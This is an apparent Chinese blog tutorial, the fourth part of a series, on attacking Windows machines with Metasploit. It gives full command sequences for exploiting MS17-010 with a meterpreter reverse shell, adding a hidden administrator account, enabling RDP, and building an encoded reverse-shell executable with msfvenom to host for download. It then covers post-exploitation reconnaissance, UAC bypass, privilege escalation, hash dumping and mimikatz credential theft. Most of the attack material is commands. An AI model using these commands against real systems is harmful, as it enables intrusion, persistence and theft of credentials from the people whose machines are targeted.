网络安全与渗透:漏洞攻击—— msf(四)此生无悔入华夏,男儿何不带吴钩

39 阅读4分钟

 

中华人民共和国网络安全法

阅读本文前,请熟读并遵守中华人民共和国网络安全法: www.npc.gov.cn/npc/c30834/…  

msf简介

 msf(The Metasploit framewok)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。

msfconsole

作用:管理生成exp,管理反弹的shell,通过反弹的shell进行后渗透。。。 运行命令

msfconsole

在这里插入图片描述 数字代表模块功能数量 模块简介:

  • exploits:利用漏洞进行攻击模块
  • payloads:攻击载荷(攻击效果控制),执行在exploits后
  • auxiliaru:信息收集,扫描,嗅探,辅助模块(扫描工具等)
  • post:后渗透模块(提取信息)
  • encoders:编码模块
  • nops:无操作生成器

基本命令

这里注意:漏洞ms17-010是windows上smb服务的一个漏洞,如果想测试此漏洞,可以在虚拟机中安装带有此漏洞的windows进行测试。

//查看某个漏洞信息
search ms17-010

可利用漏洞信息依次是: 漏洞编号,名称,描述。。。 在这里插入图片描述

//进入指定编号漏洞
use 1

//进入后,输入info,查看漏洞详细信息
info

在这里插入图片描述 其中上图的信息,显示基础配置,红框中yes为必须设置项,当然也存在默认值

//设置rhosts 参数
set rhosts 192.168.10.106

//运行脚本,完成探测
run 或者 exploit

上面用的是auxiliary模块,接下来用exp攻击模块

//切换到ms17010永恒之蓝模块
use 2

//查看信息
info

//设置rhost
set rhosts 192.168.10.106

//设置payload模块,windows/x64/meterpreter/reverse_tcp可以接收到反射shell,以此控制目标
set payload windows/x64/meterpreter/reverse_tcp

//查看参数信息,可以看到payload的lhost已经默认了,如果没有,请set lhost进行配置
show options

//执行脚本,就可以进入到反弹的meterpreter中,然后进行一些操作
run

这里介绍几个window命令,方便操作

//查看用户权限
getuid

//进入window命令行
shell

//修改编码格式为utf-8
chcp 65001

//新建用户
net user test 123456 /add

//添加用户到管理员组
net localgroup administrators test /add

//退出windows的shell
exit

//运行后渗透模块,开启对方的3389服务,然后就可以运行远程桌面登陆了
run post/windows/manage/enable_rdp

     

内网信息收集

首先生成一个病毒

msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.10.30 lport=4444 -f exe -e x86/shikata_ga_nai -i 10 -a x86 --platform windows > 1.exe
  • -e :编码器
  • -i :编码次数
  • -a:指定架构
  • --platform :指定平台
//将文件拷贝到服务器根目录并启动服务器
sudo cp 1.exe /var/www/html/
systemctl start apache2

//进入msfconsole
msfconsole

//使用模块
use exploit/multi/handler

//设置负载
set payload windows/meterpreter/reverse_tcp

//设置lhost
set lhost 192.168.10.30

//运行起来,等待反弹
run -j

在另一台window上下载并运行上面我们只做的病毒,就可以在kali中看到回弹的shell

//查看当前所有会话
sessions
//进入会话1
sessions -i 1

此时我们就可以随意操作了,比如按照上面的操作进入window的shell操作一些内容,也可以收集一些信息

//获取磁盘分区
run post/windows/gather/forensics/enum_drives

//检查机器是否为虚拟机
run post/windows/gather/checkvm 

//查看运行了那些应用
run post/windows/gather/enum_applications 

//运行了那些服务
run post/windows/gather/enum_services 

//查询它的共享
run post/windows/gather/enum_shares 

//查看版本,补丁,方便我们查找漏洞
run post/windows/gather/enum_patches

//run post/windows/gather/enum 命令后面 按tab 查看能运行的各种指令

     

凭证窃取

  • 这里说的凭证就是一些文件的hash值,因为window不会以明文存储密码
  • win的密码以hash值方式存储在sam文件中
  • 获取hasd的前提条件是system权限,可以使用后渗透模块

紧接上面的命令行运行

//后台运行
background

//运行window提权模块
use exploit/windows/local/bypassuac

//查看参数,设置session
show options
set session 1

//运行服务,查看当前权限
run
getuid

//进行提权,此时在查看权限,就可以看到我们是一个system权限
getsystem

//查看系统,进程,并迁移当前进程到system的一个进程,比如2104
sysinfo
ps
migrate 2104

//运行命令,获取hash
run post/windows/gather/hashdump
run post/windows/gather/smart_hashdump

这里介绍一款密码抓取神器,mimikatz,msf已经集成了,

//加载mimikatz
load mimikatz 
//查看命令
?
//抓取信息
msv
kerberos
等等其他命令

未完待续。。。